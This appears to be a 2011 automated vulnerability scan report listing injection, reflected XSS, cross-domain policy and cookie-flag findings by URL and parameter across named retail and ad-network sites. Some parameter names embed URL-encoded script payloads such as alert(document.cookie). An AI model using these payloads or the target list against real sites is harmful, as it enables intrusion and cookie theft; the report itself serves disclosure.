XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05162011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 16 06:15:01 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


Loading

1. SQL injection

1.1. http://img.bluenile.com/is/image/bluenile/txttemp_hdr_h5 [$layer_2_text_4 parameter]

1.2. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s08547089211642 [REST URL parameter 2]

1.3. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s37654085024105 [REST URL parameter 2]

1.4. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home [name of an arbitrarily supplied request parameter]

2. LDAP injection

2.1. http://action.media6degrees.com/orbserv/hbjs [pixId parameter]

2.2. http://cimg-1.restorationhardware.com/cm [ci parameter]

2.3. http://server.bhphotovideo.com/cm [ci parameter]

3. XPath injection

3.1. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1 [config parameter]

3.2. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1 [config parameter]

3.3. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1 [config parameter]

3.4. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1 [config parameter]

3.5. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1 [config parameter]

3.6. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll [config parameter]

3.7. http://community.petco.com/n/blogs/blog.aspx [config parameter]

3.8. http://community.petco.com/n/pfx/forum.aspx [config parameter]

4. HTTP header injection

4.1. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 [c parameter]

4.2. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 [va parameter]

5. Cross-site scripting (reflected)

5.1. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

5.2. http://buy.travelguard.com/TGI2/proc/stateselector.aspx [br parameter]

5.3. http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter]

5.4. http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter]

5.5. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]

5.6. http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter]

5.7. http://html.aggregateknowledge.com/iframe [wid parameter]

5.8. http://images3.pacsun.com/is/image/pacsun/AC_close_052110 [REST URL parameter 4]

5.9. http://images3.pacsun.com/is/image/pacsun/FSO_041911 [REST URL parameter 4]

5.10. http://images3.pacsun.com/is/image/pacsun/brand_logo007 [REST URL parameter 4]

5.11. http://images3.pacsun.com/is/image/pacsun/brand_logo014 [REST URL parameter 4]

5.12. http://images3.pacsun.com/is/image/pacsun/brand_logo015 [REST URL parameter 4]

5.13. http://images3.pacsun.com/is/image/pacsun/brand_logo016 [REST URL parameter 4]

5.14. http://images3.pacsun.com/is/image/pacsun/brand_logo017 [REST URL parameter 4]

5.15. http://images3.pacsun.com/is/image/pacsun/btnASmallV3 [REST URL parameter 4]

5.16. http://images3.pacsun.com/is/image/pacsun/btn_searchGo_v2 [REST URL parameter 4]

5.17. http://images3.pacsun.com/is/image/pacsun/detailLogo_301 [REST URL parameter 4]

5.18. http://images3.pacsun.com/is/image/pacsun/detailLogo_391 [REST URL parameter 4]

5.19. http://images3.pacsun.com/is/image/pacsun/headerEmailV3_envelope [REST URL parameter 4]

5.20. http://images3.pacsun.com/is/image/pacsun/homePromo1_051211 [REST URL parameter 4]

5.21. http://images3.pacsun.com/is/image/pacsun/homePromo2_051311 [REST URL parameter 4]

5.22. http://images3.pacsun.com/is/image/pacsun/logo_v3 [REST URL parameter 4]

5.23. http://images3.pacsun.com/is/image/pacsun/mainNav2_arrivals3Off [REST URL parameter 4]

5.24. http://images3.pacsun.com/is/image/pacsun/mainNav2_brands3Off [REST URL parameter 4]

5.25. http://images3.pacsun.com/is/image/pacsun/mainNav2_collective3Off [REST URL parameter 4]

5.26. http://images3.pacsun.com/is/image/pacsun/mainNav2_mens3Off [REST URL parameter 4]

5.27. http://images3.pacsun.com/is/image/pacsun/mainNav2_sale3Off [REST URL parameter 4]

5.28. http://images3.pacsun.com/is/image/pacsun/mainNav2_shoes3Off [REST URL parameter 4]

5.29. http://images3.pacsun.com/is/image/pacsun/mainNav2_surf3Off [REST URL parameter 4]

5.30. http://images3.pacsun.com/is/image/pacsun/mainNav2_swim3Off [REST URL parameter 4]

5.31. http://images3.pacsun.com/is/image/pacsun/mainNav2_womens3Off [REST URL parameter 4]

5.32. http://images3.pacsun.com/is/image/pacsun/newPromo_042811 [REST URL parameter 4]

5.33. http://images3.pacsun.com/is/image/pacsun/pop_email_011011b [REST URL parameter 4]

5.34. http://images3.pacsun.com/is/image/pacsun/redesign_social [REST URL parameter 4]

5.35. http://images3.pacsun.com/is/image/pacsun/spacer [REST URL parameter 4]

5.36. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard [mbox parameter]

5.37. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

5.38. http://px.steelhousemedia.com/pr [get_px parameter]

5.39. http://px.steelhousemedia.com/pr [name of an arbitrarily supplied request parameter]

5.40. http://px.steelhousemedia.com/pr [prov_id parameter]

5.41. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

5.42. https://secure.bhphotovideo.com/bnh/controller/home [O parameter]

5.43. https://secure.bhphotovideo.com/bnh/controller/home [f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd parameter]

5.44. https://secure.bhphotovideo.com/bnh/controller/home [name of an arbitrarily supplied request parameter]

5.45. http://sr2.liveperson.net/visitor/addons/deploy.asp [site parameter]

5.46. http://sv.liveclicker.net/service/api [var parameter]

5.47. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]

5.48. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget [jsonpcallback parameter]

5.49. http://www.acehardware.com/category/index.jsp [clickid parameter]

5.50. http://www.acehardware.com/category/index.jsp [name of an arbitrarily supplied request parameter]

5.51. http://www.acehardware.com/home/index.jsp [name of an arbitrarily supplied request parameter]

5.52. http://www.acehardware.com/home/index.jsp [rdir parameter]

5.53. http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5]

5.54. http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5]

5.55. http://www.bluenile.com/build-your-own-diamond-ring [name of an arbitrarily supplied request parameter]

5.56. http://www.footlocker.com/login/login.cfm [bv_AA_enabled parameter]

5.57. http://www.footlocker.com/login/login.cfm [bv_RR_enabled parameter]

5.58. http://www.footlocker.com/login/login_forgotpassword.cfm [bv_AA_enabled parameter]

5.59. http://www.footlocker.com/login/login_form.cfm [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E parameter]

5.60. http://www.footlocker.com/login/login_form.cfm [bv_AA_enabled parameter]

5.61. http://www.footlocker.com/login/login_form.cfm [name of an arbitrarily supplied request parameter]

5.62. http://www.gnc.com/community/index.jsp%20%20 [name of an arbitrarily supplied request parameter]

5.63. http://www.gnc.com/home/index.jsp [c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 parameter]

5.64. http://www.gnc.com/home/index.jsp [name of an arbitrarily supplied request parameter]

5.65. https://www.gnc.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

5.66. http://www.petsmart.com/ [name of an arbitrarily supplied request parameter]

5.67. http://www.petsmart.com/ [rdir parameter]

5.68. https://www.petsmart.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

5.69. http://www.redcrossstore.org/Shopper/Product.aspx [UniqueItemId parameter]

5.70. http://www.toshibadirect.com/td/b2c/laptops.to [name of an arbitrarily supplied request parameter]

5.71. http://www.toshibadirect.com/td/b2c/laptops.to [page parameter]

5.72. http://www.acehardware.com/category/index.jsp [Referer HTTP header]

5.73. http://www.acehardware.com/home/index.jsp [Referer HTTP header]

5.74. http://www.gnc.com/home/index.jsp [Referer HTTP header]

5.75. http://www.footlocker.com/login/login_form.cfm [TID cookie]

5.76. http://www.petco.com/ [ResonanceSegment cookie]

6. Flash cross-domain policy

6.1. http://9d060c.r.axf8.net/crossdomain.xml

6.2. http://a.netmng.com/crossdomain.xml

6.3. http://a.rfihub.com/crossdomain.xml

6.4. http://a.tribalfusion.com/crossdomain.xml

6.5. http://action.mathtag.com/crossdomain.xml

6.6. http://action.media6degrees.com/crossdomain.xml

6.7. http://ad.afy11.net/crossdomain.xml

6.8. http://ad.doubleclick.net/crossdomain.xml

6.9. http://ads.traderonline.com/crossdomain.xml

6.10. http://ads.undertone.com/crossdomain.xml

6.11. http://adserver.veruta.com/crossdomain.xml

6.12. http://altfarm.mediaplex.com/crossdomain.xml

6.13. http://b.scorecardresearch.com/crossdomain.xml

6.14. http://beacon.afy11.net/crossdomain.xml

6.15. http://bp.specificclick.net/crossdomain.xml

6.16. http://bs.serving-sys.com/crossdomain.xml

6.17. http://cebwa.122.2o7.net/crossdomain.xml

6.18. http://cimg-1.restorationhardware.com/crossdomain.xml

6.19. http://customerappreciation.petco.com/crossdomain.xml

6.20. http://d.xp1.ru4.com/crossdomain.xml

6.21. http://data.coremetrics.com/crossdomain.xml

6.22. http://dis.us.criteo.com/crossdomain.xml

6.23. http://fls.doubleclick.net/crossdomain.xml

6.24. http://gsicace.112.2o7.net/crossdomain.xml

6.25. http://hire.jobvite.com/crossdomain.xml

6.26. http://ib.adnxs.com/crossdomain.xml

6.27. http://idcs.interclick.com/crossdomain.xml

6.28. http://marketlive.122.2o7.net/crossdomain.xml

6.29. http://mbox12.offermatica.com/crossdomain.xml

6.30. http://media.fastclick.net/crossdomain.xml

6.31. http://media.gnc.com/crossdomain.xml

6.32. http://media.gsimedia.net/crossdomain.xml

6.33. http://media2.legacy.com/crossdomain.xml

6.34. http://metrics.brookstone.com/crossdomain.xml

6.35. http://metrics.ftd.com/crossdomain.xml

6.36. http://metrics.gnc.com/crossdomain.xml

6.37. http://metrics.mcafee.com/crossdomain.xml

6.38. http://metrics.pacsun.com/crossdomain.xml

6.39. http://metrics.petsmart.com/crossdomain.xml

6.40. http://mlarmani.122.2o7.net/crossdomain.xml

6.41. http://o.toshibadirect.com/crossdomain.xml

6.42. http://pix04.revsci.net/crossdomain.xml

6.43. http://r.turn.com/crossdomain.xml

6.44. http://rpt.footlocker.com/crossdomain.xml

6.45. http://s.xp1.ru4.com/crossdomain.xml

6.46. http://secure-us.imrworldwide.com/crossdomain.xml

6.47. http://segment-pixel.invitemedia.com/crossdomain.xml

6.48. http://server.bhphotovideo.com/crossdomain.xml

6.49. http://sv.liveclicker.net/crossdomain.xml

6.50. http://tags.mediaforge.com/crossdomain.xml

6.51. http://uat.netmng.com/crossdomain.xml

6.52. http://wasc.homedepot.ca/crossdomain.xml

6.53. http://www.mapquestapi.com/crossdomain.xml

6.54. http://www26.orientaltrading.com/crossdomain.xml

6.55. http://ace.imageg.net/crossdomain.xml

6.56. http://ads.adbrite.com/crossdomain.xml

6.57. http://ads.al.com/crossdomain.xml

6.58. http://feeds.bbci.co.uk/crossdomain.xml

6.59. http://gnc.imageg.net/crossdomain.xml

6.60. http://googleads.g.doubleclick.net/crossdomain.xml

6.61. http://images.scanalert.com/crossdomain.xml

6.62. http://images3.pacsun.com/crossdomain.xml

6.63. http://login.dotomi.com/crossdomain.xml

6.64. http://media.restorationhardware.com/crossdomain.xml

6.65. http://newsrss.bbc.co.uk/crossdomain.xml

6.66. https://ordering.ftd.com/crossdomain.xml

6.67. http://pet.imageg.net/crossdomain.xml

6.68. http://rya.rockyou.com/crossdomain.xml

6.69. http://s7.orientaltrading.com/crossdomain.xml

6.70. https://secure.homedepot.ca/crossdomain.xml

6.71. http://static.ak.fbcdn.net/crossdomain.xml

6.72. http://subscriptions.marvel.com/crossdomain.xml

6.73. https://subscriptions.marvel.com/crossdomain.xml

6.74. http://www.acehardware.com/crossdomain.xml

6.75. https://www.acehardware.com/crossdomain.xml

6.76. http://www.armaniexchange.com/crossdomain.xml

6.77. https://www.armaniexchange.com/crossdomain.xml

6.78. http://www.facebook.com/crossdomain.xml

6.79. http://www.ftd.com/crossdomain.xml

6.80. http://www.gnc.com/crossdomain.xml

6.81. https://www.gnc.com/crossdomain.xml

6.82. http://www.homedepot.ca/crossdomain.xml

6.83. http://www.petsmart.com/crossdomain.xml

6.84. https://www.petsmart.com/crossdomain.xml

6.85. http://www.res-x.com/crossdomain.xml

6.86. http://www.helzberg.com/crossdomain.xml

6.87. https://www.helzberg.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.3. http://cebwa.122.2o7.net/clientaccesspolicy.xml

7.4. http://gsicace.112.2o7.net/clientaccesspolicy.xml

7.5. http://marketlive.122.2o7.net/clientaccesspolicy.xml

7.6. http://metrics.brookstone.com/clientaccesspolicy.xml

7.7. http://metrics.ftd.com/clientaccesspolicy.xml

7.8. http://metrics.gnc.com/clientaccesspolicy.xml

7.9. http://metrics.mcafee.com/clientaccesspolicy.xml

7.10. http://metrics.pacsun.com/clientaccesspolicy.xml

7.11. http://metrics.petsmart.com/clientaccesspolicy.xml

7.12. http://mlarmani.122.2o7.net/clientaccesspolicy.xml

7.13. http://o.toshibadirect.com/clientaccesspolicy.xml

7.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.15. http://wasc.homedepot.ca/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://shoprunner.force.com/content/JsContentElementsGNC

8.2. http://shoprunner.force.com/content/JsContentElementsPET

8.3. http://www.ftd.com/

8.4. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

8.5. http://www.petco.com/Secure/Login.aspx

9. SSL cookie without secure flag set

9.1. https://secure.bhphotovideo.com/bnh/controller/home

9.2. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

9.3. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

9.4. https://www.acehardware.com/checkout/index.jsp

9.5. https://www.footlocker.com/account/default.cfm

9.6. https://www.footlocker.com/account/default/

9.7. https://www.petsmart.com/coreg/index.jsp

9.8. https://www.restorationhardware.com/sitewide/includes/header/search.jsp

9.9. https://ordering.ftd.com/reminder-signin/

9.10. https://ordering.ftd.com/signin/

9.11. https://ordering.ftd.com/signin/

9.12. https://secure.bluenile.com/accounts/account-sign-in.html

9.13. https://www.brookstone.com/favicon.ico

9.14. https://www.brookstone.com/formhandlerservlet

9.15. https://www.restorationhardware.com/my-account/forgot-password.jsp

9.16. https://www.restorationhardware.com/my-account/register.jsp

9.17. https://www.restorationhardware.com/my-account/sign-in.jsp

9.18. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp

9.19. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp

10. Session token in URL

10.1. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard

10.2. http://t.p.mybuys.com/webrec/wr.do

10.3. http://www.acehardware.com/storeLocServ

10.4. http://www.bluefly.com/

10.5. http://www.bluefly.com/myfly/login.jsp

10.6. http://www.facebook.com/extern/login_status.php

10.7. https://www.toshibadirect.com/images/ui5/btn_login.gif

11. Password field submitted using GET method

11.1. https://ordering.ftd.com/new-signup/

11.2. https://ordering.ftd.com/new-signup/

11.3. https://ordering.ftd.com/reminder-signin/

11.4. https://ordering.ftd.com/reminder-signin/

11.5. https://ordering.ftd.com/signin/

11.6. https://ordering.ftd.com/signin/

11.7. http://shoprunner.force.com/content/JsContentElementsGNC

11.8. http://shoprunner.force.com/content/JsContentElementsPET

11.9. http://www.ftd.com/

11.10. http://www.ftd.com/

11.11. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

11.12. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

12. Cookie scoped to parent domain

12.1. http://eval.bizrate.com/js/survey_126457_1.js

12.2. http://login.dotomi.com/ucm/UCMController

12.3. https://secure.bhphotovideo.com/bnh/controller/home

12.4. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

12.5. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

12.6. http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294

12.7. http://a.netmng.com/

12.8. http://a.rfihub.com/ca.gif

12.9. http://a.tribalfusion.com/i.cid

12.10. http://action.media6degrees.com/orbserv/hbjs

12.11. http://action.media6degrees.com/orbserv/hbpix

12.12. http://ad.trafficmp.com/a/bpix

12.13. http://ads.adbrite.com/adserver/vdi/684339

12.14. http://ads.lfstmedia.com/mark/CRITEO_INCL_US

12.15. http://ads.revsci.net/adserver/ako

12.16. http://ads.revsci.net/adserver/ako

12.17. http://ads.revsci.net/adserver/ako

12.18. http://ads.revsci.net/adserver/ako

12.19. http://ads.revsci.net/adserver/ako

12.20. http://ads.revsci.net/adserver/ako

12.21. http://ads.revsci.net/adserver/ako

12.22. http://ads.revsci.net/adserver/ako

12.23. http://adserver.veruta.com/track.fcgi

12.24. http://b.scorecardresearch.com/p

12.25. http://cdn.media.bluefly.com/media/templates/images/topnav/bluefly_blue_navi_logo.gif

12.26. http://cdn.www.bluefly.com/media/css/custom-theme/bluefly_jqui.css

12.27. http://cdn.www.bluefly.com/media/css/mybluefly.css

12.28. http://cdn.www.bluefly.com/media/templates/images/myaccount/login-submit.gif

12.29. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-create-account.gif

12.30. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-returning-customers.gif

12.31. http://cdn.www.bluefly.com/media/templates/images/myaccount/submit-submit.gif

12.32. http://dis.us.criteo.com/dis/dis.aspx

12.33. http://html.aggregateknowledge.com/iframe

12.34. http://ib.adnxs.com/pxj

12.35. http://ib.adnxs.com/seg

12.36. http://idcs.interclick.com/Segment.aspx

12.37. http://image2.pubmatic.com/AdServer/Pug

12.38. http://leadback.advertising.com/adcedge/lb

12.39. http://media.fastclick.net/w/tre

12.40. http://media.gnc.com/ipixel

12.41. http://media.gsimedia.net/ipixel

12.42. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734

12.43. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100

12.44. http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851

12.45. http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356

12.46. https://ordering.ftd.com/reminder-signin/

12.47. https://ordering.ftd.com/signin/

12.48. https://ordering.ftd.com/signin/

12.49. http://phoenix.untd.com/TRCK/RGST

12.50. http://pix04.revsci.net/D05509/b3/0/3/noscript.gif

12.51. http://pixel.fetchback.com/serve/fb/pdc

12.52. http://pixel.fetchback.com/serve/fb/ver

12.53. http://pixel.mathtag.com/data/img

12.54. http://pixel.mathtag.com/event/img

12.55. http://pixel.rubiconproject.com/tap.php

12.56. http://pixel.traveladvertising.com/Live/Pixel.aspx

12.57. http://px.steelhousemedia.com/pr

12.58. http://px.steelhousemedia.com/st

12.59. http://r.turn.com/r/beacon

12.60. http://rya.rockyou.com/ams/ptrck.php

12.61. http://s.xp1.ru4.com/meta

12.62. http://sales.liveperson.net/hc/1402662/

12.63. http://sales.liveperson.net/hc/46281118/

12.64. http://sales.liveperson.net/hc/53965383/

12.65. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png

12.66. https://secure.bluenile.com/accounts/account-sign-in.html

12.67. http://segment-pixel.invitemedia.com/pixel

12.68. http://srv.clickfuse.com/pixels/create.php

12.69. http://srv2.wa.marketingsolutions.yahoo.com/script/ScriptServlet

12.70. http://sync.mathtag.com/sync/img

12.71. http://t.p.mybuys.com/webrec/wr.do

12.72. http://tags.mediaforge.com/if/50

12.73. http://tracking.searchmarketing.com/welcome.asp

12.74. http://uat.netmng.com/pixel/

12.75. http://www.bluefly.com/

12.76. http://www.bluefly.com/myfly/forgot_password.jsp

12.77. http://www.bluefly.com/myfly/login.jsp

12.78. http://www.bluenile.com/

12.79. http://www.bluenile.com/build-your-own-diamond-ring

12.80. http://www.bluenile.com/channel-recommendations.html

12.81. http://www.bluenile.com/fbc/setStatus.html

12.82. http://www.footlocker.com/

12.83. http://www.footlocker.com/login/login.cfm

12.84. http://www.footlocker.com/login/login_forgotpassword.cfm

12.85. http://www.footlocker.com/login/login_form.cfm

12.86. https://www.footlocker.com/account/default.cfm

12.87. https://www.footlocker.com/account/default/

12.88. http://www.imiclk.com/cgi/r.cgi

12.89. http://www.linkedin.com/companyInsider

12.90. http://www.petco.com/

12.91. http://www22.glam.com/cTagsImgCmd.act

13. Cookie without HttpOnly flag set

13.1. http://action.media6degrees.com/orbserv/hbjs

13.2. http://core.bluefly.com/cm

13.3. http://eval.bizrate.com/js/survey_126457_1.js

13.4. http://login.dotomi.com/ucm/UCMController

13.5. http://sales.liveperson.net/visitor/addons/deploy.asp

13.6. http://sales.liveperson.net/visitor/addons/deploy.asp

13.7. http://sales.liveperson.net/visitor/addons/deploy.asp

13.8. https://secure.bhphotovideo.com/bnh/controller/home

13.9. https://secure.bluenile.com/926308692/bundles/core.js

13.10. https://secure.bluenile.com/984568475/css/footer.css

13.11. https://secure.bluenile.com/N1374326862/bundles/cart.css

13.12. https://secure.bluenile.com/N1991330425/js/navigation_flyouts_menu.js

13.13. https://secure.bluenile.com/N3371804/bundles/allpages.js

13.14. https://secure.bluenile.com/N3821919/bundles/footer.js

13.15. https://secure.bluenile.com/N518116487/bundles/allpages.css

13.16. https://secure.bluenile.com/N522719515/bundles/ga.js

13.17. https://secure.bluenile.com/N688855944/css/cart_print.css

13.18. https://secure.bluenile.com/accounts/account-sign-in.html

13.19. https://secure.bluenile.com/favicon.ico

13.20. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

13.21. http://t.p.mybuys.com/webrec/wr.do

13.22. http://tracking.searchmarketing.com/welcome.asp

13.23. http://tracking.searchmarketing.com/welcome.asp

13.24. http://tracking.searchmarketing.com/welcome.asp

13.25. http://tracking.searchmarketing.com/welcome.asp

13.26. http://tracking.searchmarketing.com/welcome.asp

13.27. http://tracking.searchmarketing.com/welcome.asp

13.28. http://tracking.searchmarketing.com/welcome.asp

13.29. http://tracking.searchmarketing.com/welcome.asp

13.30. http://tracking.searchmarketing.com/welcome.asp

13.31. http://tracking.searchmarketing.com/welcome.asp

13.32. http://tracking.searchmarketing.com/welcome.asp

13.33. https://www.acehardware.com/checkout/index.jsp

13.34. http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294

13.35. http://www.bluefly.com/

13.36. http://www.brookstone.com/

13.37. http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html

13.38. http://www.footlocker.com/

13.39. http://www.footlocker.com/login/login.cfm

13.40. http://www.footlocker.com/login/login_forgotpassword.cfm

13.41. http://www.footlocker.com/login/login_form.cfm

13.42. https://www.footlocker.com/account/default.cfm

13.43. https://www.footlocker.com/account/default/

13.44. http://www.gnc.com/community/index.jsp%20%20

13.45. http://www.helzberg.com/account.do

13.46. http://www.linkedin.com/companyInsider

13.47. https://www.petsmart.com/coreg/index.jsp

13.48. http://www.restorationhardware.com/my-account/sign-in.jsp

13.49. https://www.restorationhardware.com/sitewide/includes/header/search.jsp

13.50. http://a.netmng.com/

13.51. http://a.rfihub.com/ca.gif

13.52. http://a.tribalfusion.com/i.cid

13.53. http://action.media6degrees.com/orbserv/hbpix

13.54. http://ad.trafficmp.com/a/bpix

13.55. http://ad.yieldmanager.com/pixel

13.56. http://ads.adbrite.com/adserver/vdi/684339

13.57. http://ads.lfstmedia.com/mark/CRITEO_INCL_US

13.58. http://ads.revsci.net/adserver/ako

13.59. http://ads.revsci.net/adserver/ako

13.60. http://ads.revsci.net/adserver/ako

13.61. http://ads.revsci.net/adserver/ako

13.62. http://ads.revsci.net/adserver/ako

13.63. http://ads.revsci.net/adserver/ako

13.64. http://ads.revsci.net/adserver/ako

13.65. http://ads.revsci.net/adserver/ako

13.66. http://ads.undertone.com/f

13.67. http://adserver.veruta.com/track.fcgi

13.68. http://b.scorecardresearch.com/p

13.69. http://bluefly.com/

13.70. http://cdn.media.bluefly.com/media/templates/images/topnav/bluefly_blue_navi_logo.gif

13.71. http://cdn.www.bluefly.com/media/css/custom-theme/bluefly_jqui.css

13.72. http://cdn.www.bluefly.com/media/css/mybluefly.css

13.73. http://cdn.www.bluefly.com/media/templates/images/myaccount/login-submit.gif

13.74. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-create-account.gif

13.75. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-returning-customers.gif

13.76. http://cdn.www.bluefly.com/media/templates/images/myaccount/submit-submit.gif

13.77. http://cebwa.122.2o7.net/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s35820650003258

13.78. http://cimg-1.restorationhardware.com/cm

13.79. http://community.petco.com/discussions/Bird_Discussion_Forum/fd03p00v06d1

13.80. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1

13.81. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1

13.82. http://community.petco.com/discussions/Ferret_Discussion_Forum/fd03p00v07d1

13.83. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1

13.84. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1

13.85. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1

13.86. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll

13.87. http://community.petco.com/n/blogs/blog.aspx

13.88. http://community.petco.com/n/pfx/forum.aspx

13.89. http://core.bluefly.com/cm

13.90. http://customerappreciation.petco.com/cm

13.91. http://dis.us.criteo.com/dis/dis.aspx

13.92. http://gsicace.112.2o7.net/b/ss/gsicace/1/H.20.3/s35783476170925

13.93. http://hire.jobvite.com/CompanyJobs/Careers.aspx

13.94. http://html.aggregateknowledge.com/iframe

13.95. http://idcs.interclick.com/Segment.aspx

13.96. http://image2.pubmatic.com/AdServer/Pug

13.97. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif

13.98. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif

13.99. http://leadback.advertising.com/adcedge/lb

13.100. http://login.dotomi.com/ucm/UCMController

13.101. http://media.fastclick.net/w/tre

13.102. http://media.gnc.com/ipixel

13.103. http://media.gsimedia.net/ipixel

13.104. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734

13.105. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100

13.106. http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851

13.107. http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356

13.108. https://ordering.ftd.com/reminder-signin/

13.109. https://ordering.ftd.com/signin/

13.110. https://ordering.ftd.com/signin/

13.111. http://phoenix.untd.com/TRCK/RGST

13.112. http://pix04.revsci.net/D05509/b3/0/3/noscript.gif

13.113. http://pixel.fetchback.com/serve/fb/pdc

13.114. http://pixel.fetchback.com/serve/fb/ver

13.115. http://pixel.mathtag.com/data/img

13.116. http://pixel.mathtag.com/event/img

13.117. http://pixel.rubiconproject.com/tap.php

13.118. http://pixel.traveladvertising.com/Live/Pixel.aspx

13.119. http://px.steelhousemedia.com/pr

13.120. http://px.steelhousemedia.com/st

13.121. http://r.turn.com/r/beacon

13.122. http://rpt.footlocker.com/eluminate

13.123. http://rya.rockyou.com/ams/ptrck.php

13.124. http://s.xp1.ru4.com/meta

13.125. http://sales.liveperson.net/hc/1402662/

13.126. http://sales.liveperson.net/hc/1402662/

13.127. http://sales.liveperson.net/hc/1402662/

13.128. http://sales.liveperson.net/hc/46281118/

13.129. http://sales.liveperson.net/hc/46281118/

13.130. http://sales.liveperson.net/hc/53965383/

13.131. http://sales.liveperson.net/hc/53965383/

13.132. http://sales.liveperson.net/hc/53965383/

13.133. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png

13.134. http://segment-pixel.invitemedia.com/pixel

13.135. http://server.bhphotovideo.com/cm

13.136. http://srv.clickfuse.com/pixels/create.php

13.137. http://srv2.wa.marketingsolutions.yahoo.com/script/ScriptServlet

13.138. http://subscriptions.marvel.com/checkout/

13.139. http://sync.mathtag.com/sync/img

13.140. http://tags.mediaforge.com/if/50

13.141. http://trvlgrd.netmng.com/

13.142. http://uat.netmng.com/pixel/

13.143. http://web.aisle7.net/jsapi/1.0/content.js

13.144. http://www.acehardware.com/category/index.jsp

13.145. http://www.bhphotovideo.com/bnh/controller/home

13.146. http://www.bluefly.com/__ssobj/ard.png

13.147. http://www.bluefly.com/__ssobj/core.js

13.148. http://www.bluefly.com/favicon.ico

13.149. http://www.bluefly.com/myfly/forgot_password.jsp

13.150. http://www.bluefly.com/myfly/login.jsp

13.151. http://www.bluenile.com/

13.152. http://www.bluenile.com/build-your-own-diamond-ring

13.153. http://www.bluenile.com/channel-recommendations.html

13.154. http://www.bluenile.com/fbc/setStatus.html

13.155. http://www.brookstone.com/favicon.ico

13.156. http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html

13.157. http://www.brookstone.com/formhandlerservlet

13.158. http://www.brookstone.com/outdoor-living.html

13.159. http://www.brookstone.com/shoppingCart.jsp.vr

13.160. https://www.brookstone.com/favicon.ico

13.161. https://www.brookstone.com/formhandlerservlet

13.162. http://www.gnc.com/home/index.jsp

